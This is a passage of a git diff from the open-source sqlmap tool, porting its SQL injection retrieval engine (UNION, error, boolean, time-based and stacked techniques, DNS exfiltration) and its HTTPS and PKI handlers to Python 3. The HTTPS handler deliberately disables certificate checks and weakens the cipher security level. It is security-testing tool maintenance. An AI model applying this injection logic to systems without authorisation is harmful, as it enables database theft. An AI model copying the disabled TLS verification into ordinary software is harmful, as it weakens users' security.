finally: + if s: + s.close() + + if response and b"google" in response: + raise socket.error("another DNS service already running on '0.0.0.0:53'") def pop(self, prefix=None, suffix=None): """ @@ -74,11 +114,17 @@ def pop(self, prefix=None, suffix=None): retVal = None + if prefix and hasattr(prefix, "encode"): + prefix = prefix.encode() + + if suffix and hasattr(suffix, "encode"): + suffix = suffix.encode() + with self._lock: for _ in self._requests: - if prefix is None and suffix is None or re.search("%s\..+\.%s" % (prefix, suffix), _, re.I): - retVal = _ + if prefix is None and suffix is None or re.search(b"%s\\..+\\.%s" % (prefix, suffix), _, re.I): self._requests.remove(_) + retVal = _.decode() break return retVal @@ -91,6 +137,7 @@ def run(self): def _(): try: self._running = True + self._initialized = True while True: data, addr = self._socket.recvfrom(1024) @@ -116,6 +163,9 @@ def _(): server = DNSServer() server.run() + while not server._initialized: + time.sleep(0.1) + while server._running: while True: _ = server.pop() @@ -123,13 +173,13 @@ def _(): if _ is None: break else: - print "[i] %s" % _ + print("[i] %s" % _) time.sleep(1) - except socket.error, ex: + except socket.error as ex: if 'Permission' in str(ex): - print "[x] Please run with sudo/Administrator privileges" + print("[x] Please run with sudo/Administrator privileges") else: raise except KeyboardInterrupt: diff --git a/lib/request/httpshandler.py b/lib/request/httpshandler.py index 35a06f0bb8f..94f50fb1a16 100644 --- a/lib/request/httpshandler.py +++ b/lib/request/httpshandler.py @@ -1,16 +1,24 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ -import httplib +import re import socket -import urllib2 +from lib.core.common import filterNone +from lib.core.common import getSafeExString +from lib.core.compat import LooseVersion +from lib.core.compat import xrange +from lib.core.data import conf +from lib.core.data import kb from lib.core.data import logger from lib.core.exception import SqlmapConnectionException +from lib.core.settings import PYVERSION +from thirdparty.six.moves import http_client as _http_client +from thirdparty.six.moves import urllib as _urllib ssl = None try: @@ -19,17 +27,29 @@ except ImportError: pass -_protocols = [ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLSv1] +_protocols = filterNone(getattr(ssl, _, None) for _ in ("PROTOCOL_TLS_CLIENT", "PROTOCOL_TLSv1_2", "PROTOCOL_TLSv1_1", "PROTOCOL_TLSv1", "PROTOCOL_SSLv3", "PROTOCOL_SSLv23", "PROTOCOL_SSLv2")) +_lut = dict((getattr(ssl, _), _) for _ in dir(ssl) if _.startswith("PROTOCOL_")) +_contexts = {} -class HTTPSConnection(httplib.HTTPSConnection): +class HTTPSConnection(_http_client.HTTPSConnection): """ Connection class that enables usage of newer SSL protocols. Reference: http://bugs.python.org/msg128686 + + NOTE: use https://check-tls.akamaized.net/ to check if (e.g.) TLS/SNI is working properly """ def __init__(self, *args, **kwargs): - httplib.HTTPSConnection.__init__(self, *args, **kwargs) + # NOTE: Dirty patch for https://bugs.python.org/issue38251 / https://github.com/sqlmapproject/sqlmap/issues/4158 + if hasattr(ssl, "_create_default_https_context"): + if None not in _contexts: + _contexts[None] = ssl._create_default_https_context() + kwargs["context"] = _contexts[None] + + self.retrying = False + + _http_client.HTTPSConnection.__init__(self, *args, **kwargs) def connect(self): def create_sock(): @@ -41,24 +61,82 @@ def create_sock(): success = False - for protocol in _protocols: - try: - sock = create_sock() - _ = ssl.wrap_socket(sock, self.key_file, self.cert_file, ssl_version=protocol) - if _: - success = True - self.sock = _ - _protocols.remove(protocol) - _protocols.insert(0, protocol) - break - else: - sock.close() - except ssl.SSLError, errMsg: - logger.debug("SSL connection error occured ('%s')" % errMsg) + # Reference(s): https://docs.python.org/2/library/ssl.html#ssl.SSLContext + # https://www.mnot.net/blog/2014/12/27/python_2_and_tls_sni + if hasattr(ssl, "SSLContext"): + for protocol in (_ for _ in _protocols if _ >= ssl.PROTOCOL_TLSv1): + sock = None + try: + sock = create_sock() + if protocol not in _contexts: + _contexts[protocol] = ssl.SSLContext(protocol) + + # Disable certificate and hostname validation enabled by default with PROTOCOL_TLS_CLIENT + _contexts[protocol].check_hostname = False + _contexts[protocol].verify_mode = ssl.CERT_NONE + + if getattr(self, "cert_file", None) and getattr(self, "key_file", None): + _contexts[protocol].load_cert_chain(certfile=self.cert_file, keyfile=self.key_file) + try: + # Reference(s): https://askubuntu.com/a/1263098 + # https://askubuntu.com/a/1250807 + # https://git.zknt.org/mirror/bazarr/commit/7f05f932ffb84ba8b9e5630b2adc34dbd77e2b4a?style=split&whitespace=show-all&show-outdated= + _contexts[protocol].set_ciphers("ALL@SECLEVEL=0") + except (ssl.SSLError, AttributeError): + pass + result = _contexts[protocol].wrap_socket(sock, do_handshake_on_connect=True, server_hostname=self.host if re.search(r"\A[\d.]+\Z", self.host or "") is None else None) + if result: + success = True + self.sock = result + _protocols.remove(protocol) + _protocols.insert(0, protocol) + break + else: + sock.close() + except (ssl.SSLError, socket.error, _http_client.BadStatusLine, AttributeError) as ex: + self._tunnel_host = None + if sock: + sock.close() + logger.debug("SSL connection error occurred for '%s' ('%s')" % (_lut[protocol], getSafeExString(ex))) + + elif hasattr(ssl, "wrap_socket"): + for protocol in _protocols: + try: + sock = create_sock() + _ = ssl.wrap_socket(sock, keyfile=getattr(self, "key_file"), certfile=getattr(self, "cert_file"), ssl_version=protocol) + if _: + success = True + self.sock = _ + _protocols.remove(protocol) + _protocols.insert(0, protocol) + break + else: + sock.close() + except (ssl.SSLError, socket.error, _http_client.BadStatusLine) as ex: + self._tunnel_host = None + logger.debug("SSL connection error occurred for '%s' ('%s')" % (_lut[protocol], getSafeExString(ex))) if not success: - raise SqlmapConnectionException("can't establish SSL connection") + errMsg = "can't establish SSL connection" + # Reference: https://docs.python.org/2/library/ssl.html + if LooseVersion(PYVERSION) < LooseVersion("2.7.9"): + errMsg += " (please retry with Python >= 2.7.9)" + + if kb.sslSuccess and not self.retrying: + self.retrying = True + + for _ in xrange(conf.retries): + try: + self.connect() + except SqlmapConnectionException: + pass + else: + return + + raise SqlmapConnectionException(errMsg) + else: + kb.sslSuccess = True -class HTTPSHandler(urllib2.HTTPSHandler): +class HTTPSHandler(_urllib.request.HTTPSHandler): def https_open(self, req): - return self.do_open(HTTPSConnection if ssl else httplib.HTTPSConnection, req) + return self.do_open(HTTPSConnection if ssl else _http_client.HTTPSConnection, req) diff --git a/lib/request/inject.py b/lib/request/inject.py index 962e633dabc..2bb641acad8 100644 --- a/lib/request/inject.py +++ b/lib/request/inject.py @@ -1,45 +1,62 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ +from __future__ import print_function + import re import time from lib.core.agent import agent from lib.core.bigarray import BigArray +from lib.core.common import applyFunctionRecursively from lib.core.common import Backend from lib.core.common import calculateDeltaSeconds from lib.core.common import cleanQuery from lib.core.common import expandAsteriskForColumns from lib.core.common import extractExpectedValue +from lib.core.common import filterNone from lib.core.common import getPublicTypeMembers +from lib.core.common import getTechnique +from lib.core.common import getTechniqueData from lib.core.common import hashDBRetrieve from lib.core.common import hashDBWrite from lib.core.common import initTechnique +from lib.core.common import isDigit from lib.core.common import isNoneValue from lib.core.common import isNumPosStrValue from lib.core.common import isTechniqueAvailable from lib.core.common import parseUnionPage from lib.core.common import popValue from lib.core.common import pushValue +from lib.core.common import randomStr from lib.core.common import readInput +from lib.core.common import setTechnique from lib.core.common import singleTimeWarnMessage +from lib.core.compat import xrange from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger from lib.core.data import queries +from lib.core.decorators import lockedmethod +from lib.core.decorators import stackedmethod from lib.core.dicts import FROM_DUMMY_TABLE from lib.core.enums import CHARSET_TYPE from lib.core.enums import DBMS from lib.core.enums import EXPECTED from lib.core.enums import PAYLOAD +from lib.core.exception import SqlmapConnectionException +from lib.core.exception import SqlmapDataException from lib.core.exception import SqlmapNotVulnerableException from lib.core.exception import SqlmapUserQuitException +from lib.core.settings import GET_VALUE_UPPERCASE_KEYWORDS +from lib.core.settings import INFERENCE_MARKER from lib.core.settings import MAX_TECHNIQUES_PER_VALUE from lib.core.settings import SQL_SCALAR_REGEX +from lib.core.settings import UNICODE_ENCODING from lib.core.threads import getCurrentThreadData from lib.request.connect import Connect as Request from lib.request.direct import direct @@ -49,11 +66,12 @@ from lib.techniques.dns.use import dnsUse from lib.techniques.error.use import errorUse from lib.techniques.union.use import unionUse +from thirdparty import six def _goDns(payload, expression): value = None - if conf.dnsName and kb.dnsTest is not False: + if conf.dnsDomain and kb.dnsTest is not False and not kb.testMode and Backend.getDbms() is not None: if kb.dnsTest is None: dnsTest(payload) @@ -69,14 +87,33 @@ def _goInference(payload, expression, charsetType=None, firstChar=None, lastChar value = _goDns(payload, expression) - if value: + if payload is None: + return None + + if value is not None: return value - timeBasedCompare = (kb.technique in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED)) + timeBasedCompare = (getTechnique() in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED)) + + if timeBasedCompare and conf.threads > 1 and kb.forceThreads is None: + msg = "multi-threading is considered unsafe in " + msg += "time-based data retrieval. Are you sure " + msg += "of your choice (breaking warranty) [y/N] " + + kb.forceThreads = readInput(msg, default='N', boolean=True) if not (timeBasedCompare and kb.dnsTest): - if (conf.eta or conf.threads > 1) and Backend.getIdentifiedDbms() and not re.search("(COUNT|LTRIM)\(", expression, re.I) and not timeBasedCompare: - if field and conf.hexConvert: + if (conf.eta or conf.threads > 1) and Backend.getIdentifiedDbms() and not re.search(r"(COUNT|LTRIM)\(", expression, re.I) and not (timeBasedCompare and not kb.forceThreads): + + if field and re.search(r"\ASELECT\s+DISTINCT\((.+?)\)\s+FROM", expression, re.I): + if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.MONETDB, DBMS.VERTICA, DBMS.CRATEDB, DBMS.CUBRID): + alias = randomStr(lowercase=True, seed=hash(expression)) + expression = "SELECT %s FROM (%s)" % (field if '.' not in field else re.sub(r".+\.", "%s." % alias, field), expression) # Note: MonetDB as a prime example + expression += " AS %s" % alias + else: + expression = "SELECT %s FROM (%s)" % (field, expression) + + if field and conf.hexConvert or conf.binaryFields and field in conf.binaryFields or Backend.getIdentifiedDbms() in (DBMS.RAIMA,): nulledCastedField = agent.nullAndCastField(field) injExpression = expression.replace(field, nulledCastedField, 1) else: @@ -90,7 +127,7 @@ def _goInference(payload, expression, charsetType=None, firstChar=None, lastChar kb.inferenceMode = False if not kb.bruteMode: - debugMsg = "performed %d queries in %d seconds" % (count, calculateDeltaSeconds(start)) + debugMsg = "performed %d quer%s in %.2f seconds" % (count, 'y' if count == 1 else "ies", calculateDeltaSeconds(start)) logger.debug(debugMsg) return value @@ -107,7 +144,7 @@ def _goInferenceFields(expression, expressionFields, expressionFieldsList, paylo if isinstance(num, int): origExpr = expression - expression = agent.limitQuery(num, expression, field) + expression = agent.limitQuery(num, expression, field, expressionFieldsList[0]) if "ROWNUM" in expressionFieldsList: expressionReplaced = expression @@ -130,9 +167,9 @@ def _goInferenceProxy(expression, fromUser=False, batch=False, unpack=True, char parameter through a bisection algorithm. """ - initTechnique(kb.technique) + initTechnique(getTechnique()) - query = agent.prefixQuery(kb.injection.data[kb.technique].vector) + query = agent.prefixQuery(getTechniqueData().vector) query = agent.suffixQuery(query) payload = agent.payload(newValue=query) count = None @@ -145,7 +182,7 @@ def _goInferenceProxy(expression, fromUser=False, batch=False, unpack=True, char _, _, _, _, _, expressionFieldsList, expressionFields, _ = agent.getFields(expression) - rdbRegExp = re.search("RDB\$GET_CONTEXT\([^)]+\)", expression, re.I) + rdbRegExp = re.search(r"RDB\$GET_CONTEXT\([^)]+\)", expression, re.I) if rdbRegExp and Backend.isDbms(DBMS.FIREBIRD): expressionFieldsList = [expressionFields] @@ -161,16 +198,13 @@ def _goInferenceProxy(expression, fromUser=False, batch=False, unpack=True, char # forge the SQL limiting the query output one entry at a time # NOTE: we assume that only queries that get data from a table # can return multiple entries - if fromUser and " FROM " in expression.upper() and ((Backend.getIdentifiedDbms() \ - not in FROM_DUMMY_TABLE) or (Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and not \ - expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))) \ - and not re.search(SQL_SCALAR_REGEX, expression, re.I): + if fromUser and " FROM " in expression.upper() and ((Backend.getIdentifiedDbms() not in FROM_DUMMY_TABLE) or (Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and not expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))) and not re.search(SQL_SCALAR_REGEX, expression, re.I) and hasattr(queries[Backend.getIdentifiedDbms()].limitregexp, "query"): expression, limitCond, topLimit, startLimit, stopLimit = agent.limitCondition(expression) if limitCond: test = True - if not stopLimit or stopLimit <= 1: + if stopLimit is None or stopLimit <= 1: if Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]): test = False @@ -179,7 +213,7 @@ def _goInferenceProxy(expression, fromUser=False, batch=False, unpack=True, char countFirstField = queries[Backend.getIdentifiedDbms()].count.query % expressionFieldsList[0] countedExpression = expression.replace(expressionFields, countFirstField, 1) - if " ORDER BY " in expression.upper(): + if " ORDER BY " in countedExpression.upper(): _ = countedExpression.upper().rindex(" ORDER BY ") countedExpression = countedExpression[:_] @@ -189,7 +223,7 @@ def _goInferenceProxy(expression, fromUser=False, batch=False, unpack=True, char if isNumPosStrValue(count): count = int(count) - if batch: + if batch or count == 1: stopLimit = count else: message = "the SQL query provided can return " @@ -197,26 +231,26 @@ def _goInferenceProxy(expression, fromUser=False, batch=False, unpack=True, char message += "entries do you want to retrieve?\n" message += "[a] All (default)\n[#] Specific number\n" message += "[q] Quit" - test = readInput(message, default="a") + choice = readInput(message, default='A').upper() - if not test or test[0] in ("a", "A"): + if choice == 'A': stopLimit = count - elif test[0] in ("q", "Q"): + elif choice == 'Q': raise SqlmapUserQuitException - elif test.isdigit() and int(test) > 0 and int(test) <= count: - stopLimit = int(test) + elif isDigit(choice) and int(choice) > 0 and int(choice) <= count: + stopLimit = int(choice) infoMsg = "sqlmap is now going to retrieve the " infoMsg += "first %d query output entries" % stopLimit logger.info(infoMsg) - elif test[0] in ("#", "s", "S"): + elif choice in ('#', 'S'): message = "how many? " stopLimit = readInput(message, default="10") - if not stopLimit.isdigit(): + if not isDigit(stopLimit): errMsg = "invalid choice" logger.error(errMsg) @@ -231,20 +265,20 @@ def _goInferenceProxy(expression, fromUser=False, batch=False, unpack=True, char return None - elif count and not count.isdigit(): + elif count and not isDigit(count): warnMsg = "it was not possible to count the number " warnMsg += "of entries for the SQL query provided. " warnMsg += "sqlmap will assume that it returns only " warnMsg += "one entry" - logger.warn(warnMsg) + logger.warning(warnMsg) stopLimit = 1 - elif (not count or int(count) == 0): + elif not isNumPosStrValue(count): if not count: warnMsg = "the SQL query provided does not " warnMsg += "return any output" - logger.warn(warnMsg) + logger.warning(warnMsg) return None @@ -252,14 +286,19 @@ def _goInferenceProxy(expression, fromUser=False, batch=False, unpack=True, char return None try: - for num in xrange(startLimit, stopLimit): - output = _goInferenceFields(expression, expressionFields, expressionFieldsList, payload, num=num, charsetType=charsetType, firstChar=firstChar, lastChar=lastChar, dump=dump) - outputs.append(output) + try: + for num in xrange(startLimit or 0, stopLimit or 0): + output = _goInferenceFields(expression, expressionFields, expressionFieldsList, payload, num=num, charsetType=charsetType, firstChar=firstChar, lastChar=lastChar, dump=dump) + outputs.append(output) + except OverflowError: + errMsg = "boundary limits (%d,%d) are too large. Please rerun " % (startLimit, stopLimit) + errMsg += "with switch '--fresh-queries'" + raise SqlmapDataException(errMsg) except KeyboardInterrupt: - print + print() warnMsg = "user aborted during dumping phase" - logger.warn(warnMsg) + logger.warning(warnMsg) return outputs @@ -268,21 +307,31 @@ def _goInferenceProxy(expression, fromUser=False, batch=False, unpack=True, char outputs = _goInferenceFields(expression, expressionFields, expressionFieldsList, payload, charsetType=charsetType, firstChar=firstChar, lastChar=lastChar, dump=dump) - return ", ".join(output for output in outputs) if not isNoneValue(outputs) else None + return ", ".join(output or "" for output in outputs) if not isNoneValue(outputs) else None def _goBooleanProxy(expression): """ Retrieve the output of a boolean based SQL query """ - initTechnique(kb.technique) + initTechnique(getTechnique()) - vector = kb.injection.data[kb.technique].vector - vector = vector.replace("[INFERENCE]", expression) + if conf.dnsDomain: + query = agent.prefixQuery(getTechniqueData().vector) + query = agent.suffixQuery(query) + payload = agent.payload(newValue=query) + output = _goDns(payload, expression) + + if output is not None: + return output + + vector = getTechniqueData().vector + vector = vector.replace(INFERENCE_MARKER, expression) query = agent.prefixQuery(vector) query = agent.suffixQuery(query) payload = agent.payload(newValue=query) - timeBasedCompare = kb.technique in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED) + + timeBasedCompare = getTechnique() in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED) output = hashDBRetrieve(expression, checkConf=True) @@ -302,32 +351,45 @@ def _goUnion(expression, unpack=True, dump=False): output = unionUse(expression, unpack=unpack, dump=dump) - if isinstance(output, basestring): + if isinstance(output, six.string_types): output = parseUnionPage(output) return output +@lockedmethod +@stackedmethod def getValue(expression, blind=True, union=True, error=True, time=True, fromUser=False, expected=None, batch=False, unpack=True, resumeValue=True, charsetType=None, firstChar=None, lastChar=None, dump=False, suppressOutput=None, expectingNone=False, safeCharEncode=True): """ Called each time sqlmap inject a SQL query on the SQL injection affected parameter. """ - if conf.hexConvert: - charsetType = CHARSET_TYPE.HEXADECIMAL + if conf.hexConvert and expected != EXPECTED.BOOL and Backend.getIdentifiedDbms(): + if not hasattr(queries[Backend.getIdentifiedDbms()], "hex"): + warnMsg = "switch '--hex' is currently not supported on DBMS %s" % Backend.getIdentifiedDbms() + singleTimeWarnMessage(warnMsg) + conf.hexConvert = False + else: + charsetType = CHARSET_TYPE.HEXADECIMAL kb.safeCharEncode = safeCharEncode kb.resumeValues = resumeValue + for keyword in GET_VALUE_UPPERCASE_KEYWORDS: + expression = re.sub(r"(?i)(\A|\(|\)|\s)%s(\Z|\(|\)|\s)" % keyword, r"\g<1>%s\g<2>" % keyword, expression) + if suppressOutput is not None: pushValue(getCurrentThreadData().disableStdOut) getCurrentThreadData().disableStdOut = suppressOutput try: + pushValue(conf.db) + pushValue(conf.tbl) + if expected == EXPECTED.BOOL: forgeCaseExpression = booleanExpression = expression - if expression.upper().startswith("SELECT "): + if expression.startswith("SELECT "): booleanExpression = "(%s)=%s" % (booleanExpression, "'1'" if "'1'" in booleanExpression else "1") else: forgeCaseExpression = agent.forgeCaseStatement(expression) @@ -335,7 +397,7 @@ def getValue(expression, blind=True, union=True, error=True, time=True, fromUser if conf.direct: value = direct(forgeCaseExpression if expected == EXPECTED.BOOL else expression) - elif any(map(isTechniqueAvailable, getPublicTypeMembers(PAYLOAD.TECHNIQUE, onlyValues=True))): + elif any(isTechniqueAvailable(_) for _ in getPublicTypeMembers(PAYLOAD.TECHNIQUE, onlyValues=True)): query = cleanQuery(expression) query = expandAsteriskForColumns(query) value = None @@ -347,26 +409,58 @@ def getValue(expression, blind=True, union=True, error=True, time=True, fromUser if not conf.forceDns: if union and isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION): - kb.technique = PAYLOAD.TECHNIQUE.UNION - value = _goUnion(forgeCaseExpression if expected == EXPECTED.BOOL else query, unpack, dump) + setTechnique(PAYLOAD.TECHNIQUE.UNION) + kb.forcePartialUnion = kb.injection.data[PAYLOAD.TECHNIQUE.UNION].vector[8] + fallback = not expected and kb.injection.data[PAYLOAD.TECHNIQUE.UNION].where == PAYLOAD.WHERE.ORIGINAL and not kb.forcePartialUnion + + if expected == EXPECTED.BOOL: + # Note: some DBMSes (e.g. Altibase) don't support implicit conversion of boolean check result during concatenation with prefix and suffix (e.g. 'qjjvq'||(1=1)||'qbbbq') + + if not any(_ in forgeCaseExpression for _ in ("SELECT", "CASE")): + forgeCaseExpression = "(CASE WHEN (%s) THEN '1' ELSE '0' END)" % forgeCaseExpression + + try: + value = _goUnion(forgeCaseExpression if expected == EXPECTED.BOOL else query, unpack, dump) + except SqlmapConnectionException: + if not fallback: + raise + count += 1 found = (value is not None) or (value is None and expectingNone) or count >= MAX_TECHNIQUES_PER_VALUE + if not found and fallback: + warnMsg = "something went wrong with full UNION " + warnMsg += "technique (could be because of " + warnMsg += "limitation on retrieved number of entries)" + if " FROM " in query.upper(): + warnMsg += ". Falling back to partial UNION technique" + singleTimeWarnMessage(warnMsg) + + try: + pushValue(kb.forcePartialUnion) + kb.forcePartialUnion = True + value = _goUnion(query, unpack, dump) + found = (value is not None) or (value is None and expectingNone) + finally: + kb.forcePartialUnion = popValue() + else: + singleTimeWarnMessage(warnMsg) + if error and any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) and not found: - kb.technique = PAYLOAD.TECHNIQUE.ERROR if isTechniqueAvailable(PAYLOAD.TECHNIQUE.ERROR) else PAYLOAD.TECHNIQUE.QUERY + setTechnique(PAYLOAD.TECHNIQUE.ERROR if isTechniqueAvailable(PAYLOAD.TECHNIQUE.ERROR) else PAYLOAD.TECHNIQUE.QUERY) value = errorUse(forgeCaseExpression if expected == EXPECTED.BOOL else query, dump) count += 1 found = (value is not None) or (value is None and expectingNone) or count >= MAX_TECHNIQUES_PER_VALUE - if found and conf.dnsName: - _ = "".join(filter(None, (key if isTechniqueAvailable(value) else None for key, value in {"E": PAYLOAD.TECHNIQUE.ERROR, "Q": PAYLOAD.TECHNIQUE.QUERY, "U": PAYLOAD.TECHNIQUE.UNION}.items()))) + if found and conf.dnsDomain: + _ = "".join(filterNone(key if isTechniqueAvailable(value) else None for key, value in {'E': PAYLOAD.TECHNIQUE.ERROR, 'Q': PAYLOAD.TECHNIQUE.QUERY, 'U': PAYLOAD.TECHNIQUE.UNION}.items())) warnMsg = "option '--dns-domain' will be ignored " warnMsg += "as faster techniques are usable " warnMsg += "(%s) " % _ singleTimeWarnMessage(warnMsg) if blind and isTechniqueAvailable(PAYLOAD.TECHNIQUE.BOOLEAN) and not found: - kb.technique = PAYLOAD.TECHNIQUE.BOOLEAN + setTechnique(PAYLOAD.TECHNIQUE.BOOLEAN) if expected == EXPECTED.BOOL: value = _goBooleanProxy(booleanExpression) @@ -377,16 +471,18 @@ def getValue(expression, blind=True, union=True, error=True, time=True, fromUser found = (value is not None) or (value is None and expectingNone) or count >= MAX_TECHNIQUES_PER_VALUE if time and (isTechniqueAvailable(PAYLOAD.TECHNIQUE.TIME) or isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED)) and not found: + match = re.search(r"\bFROM\b ([^ ]+).+ORDER BY ([^ ]+)", expression) + kb.responseTimeMode = "%s|%s" % (match.group(1), match.group(2)) if match else None + if isTechniqueAvailable(PAYLOAD.TECHNIQUE.TIME): - kb.technique = PAYLOAD.TECHNIQUE.TIME + setTechnique(PAYLOAD.TECHNIQUE.TIME) else: - kb.technique = PAYLOAD.TECHNIQUE.STACKED + setTechnique(PAYLOAD.TECHNIQUE.STACKED) if expected == EXPECTED.BOOL: value = _goBooleanProxy(booleanExpression) else: value = _goInferenceProxy(query, fromUser, batch, unpack, charsetType, firstChar, lastChar, dump) - else: errMsg = "none of the injection types identified can be " errMsg += "leveraged to retrieve queries output" @@ -394,21 +490,68 @@ def getValue(expression, blind=True, union=True, error=True, time=True, fromUser finally: kb.resumeValues = True + kb.responseTimeMode = None + + conf.tbl = popValue() + conf.db = popValue() if suppressOutput is not None: getCurrentThreadData().disableStdOut = popValue() kb.safeCharEncode = False - if not kb.testMode and value is None and Backend.getDbms() and conf.dbmsHandler: - warnMsg = "in case of continuous data retrieval problems you are advised to try " - warnMsg += "a switch '--no-cast' and/or switch '--hex'" - singleTimeWarnMessage(warnMsg) + if not any((kb.testMode, conf.dummy, conf.offline, conf.noCast, conf.hexConvert)) and value is None and Backend.getDbms() and conf.dbmsHandler and kb.fingerprinted: + if conf.abortOnEmpty: + errMsg = "aborting due to empty data retrieval" + logger.critical(errMsg) + raise SystemExit + else: + warnMsg = "in case of continuous data retrieval problems you are advised to try " + warnMsg += "a switch '--no-cast' " + warnMsg += "or switch '--hex'" if hasattr(queries[Backend.getIdentifiedDbms()], "hex") else "" + singleTimeWarnMessage(warnMsg) + + # Dirty patch (MSSQL --binary-fields with 0x31003200...) + if Backend.isDbms(DBMS.MSSQL) and conf.binaryFields: + def _(value): + if isinstance(value, six.text_type): + if value.startswith(u"0x"): + value = value[2:] + if value and len(value) % 4 == 0: + candidate = "" + for i in xrange(len(value)): + if i % 4 < 2: + candidate += value[i] + elif value[i] != '0': + candidate = None + break + if candidate: + value = candidate + return value + + value = applyFunctionRecursively(value, _) + + # Dirty patch (safe-encoded unicode characters) + if isinstance(value, six.text_type) and "\\x" in value: + try: + candidate = eval(repr(value).replace("\\\\x", "\\x").replace("u'", "'", 1)).decode(conf.encoding or UNICODE_ENCODING) + if "\\x" not in candidate: + value = candidate + except: + pass return extractExpectedValue(value, expected) def goStacked(expression, silent=False): - kb.technique = PAYLOAD.TECHNIQUE.STACKED + if PAYLOAD.TECHNIQUE.STACKED in kb.injection.data: + setTechnique(PAYLOAD.TECHNIQUE.STACKED) + else: + for technique in getPublicTypeMembers(PAYLOAD.TECHNIQUE, True): + _ = getTechniqueData(technique) + if _ and "stacked" in _["title"].lower(): + setTechnique(technique) + break + expression = cleanQuery(expression) if conf.direct: @@ -417,7 +560,7 @@ def goStacked(expression, silent=False): query = agent.prefixQuery(";%s" % expression) query = agent.suffixQuery(query) payload = agent.payload(newValue=query) - Request.queryPage(payload, content=False, silent=silent, noteResponseTime=False, timeBasedCompare=True) + Request.queryPage(payload, content=False, silent=silent, noteResponseTime=False, timeBasedCompare="SELECT" in (payload or "").upper()) def checkBooleanExpression(expression, expectingNone=True): return getValue(expression, expected=EXPECTED.BOOL, charsetType=CHARSET_TYPE.BINARY, suppressOutput=True, expectingNone=expectingNone) diff --git a/lib/request/methodrequest.py b/lib/request/methodrequest.py index 14c41ed9b71..3250cfe5c60 100644 --- a/lib/request/methodrequest.py +++ b/lib/request/methodrequest.py @@ -1,20 +1,20 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ -import urllib2 +from lib.core.convert import getText +from thirdparty.six.moves import urllib as _urllib - -class MethodRequest(urllib2.Request): - ''' - Used to create HEAD/PUT/DELETE/... requests with urllib2 - ''' +class MethodRequest(_urllib.request.Request): + """ + Used to create HEAD/PUT/DELETE/... requests with urllib + """ def set_method(self, method): - self.method = method.upper() + self.method = getText(method.upper()) # Dirty hack for Python3 (may it rot in hell!) def get_method(self): - return getattr(self, 'method', urllib2.Request.get_method(self)) + return getattr(self, 'method', _urllib.request.Request.get_method(self)) diff --git a/lib/request/pkihandler.py b/lib/request/pkihandler.py new file mode 100644 index 00000000000..5b1c3495e4b --- /dev/null +++ b/lib/request/pkihandler.py @@ -0,0 +1,51 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +ssl = None +try: + import ssl as _ssl + ssl = _ssl +except ImportError: + pass + +from lib.core.data import conf +from lib.core.common import getSafeExString +from lib.core.exception import SqlmapConnectionException +from thirdparty.six.moves import http_client as _http_client +from thirdparty.six.moves import urllib as _urllib + + +class HTTPSPKIAuthHandler(_urllib.request.HTTPSHandler): + def __init__(self, auth_file): + _urllib.request.HTTPSHandler.__init__(self) + self.auth_file = auth_file + + def https_open(self, req): + return self.do_open(self.getConnection, req) + + def getConnection(self, host, timeout=None): + if timeout is None: + timeout = conf.timeout + + if not hasattr(_http_client, "HTTPSConnection"): + raise SqlmapConnectionException("HTTPS support is not available in this Python build") + + try: + if ssl and hasattr(ssl, "SSLContext") and hasattr(ssl, "create_default_context"): + ctx = ssl.create_default_context() + ctx.load_cert_chain(certfile=self.auth_file, keyfile=self.auth_file) + try: + return _http_client.HTTPSConnection(host, timeout=timeout, context=ctx) + except TypeError: + pass + + return _http_client.HTTPSConnection(host, cert_file=self.auth_file, key_file=self.auth_file, timeout=timeout) + + except (IOError, OSError) as ex: + errMsg = "error occurred while using key " + errMsg += "file '%s' ('%s')" % (self.auth_file, getSafeExString(ex)) + raise SqlmapConnectionException(errMsg) diff --git a/lib/request/rangehandler.py b/lib/request/rangehandler.py index 683de39d654..1d19cfdd154 100644 --- a/lib/request/rangehandler.py +++ b/lib/request/rangehandler.py @@ -1,50 +1,29 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ -import urllib -import urllib2 - from lib.core.exception import SqlmapConnectionException +from thirdparty.six.moves import urllib as _urllib -class HTTPRangeHandler(urllib2.BaseHandler): +class HTTPRangeHandler(_urllib.request.BaseHandler): """ Handler that enables HTTP Range headers. Reference: http://stackoverflow.com/questions/1971240/python-seek-on-remote-file - - This was extremely simple. The Range header is a HTTP feature to - begin with so all this class does is tell urllib2 that the - "206 Partial Content" response from the HTTP server is what we - expected. - - Example: - import urllib2 - import byterange - 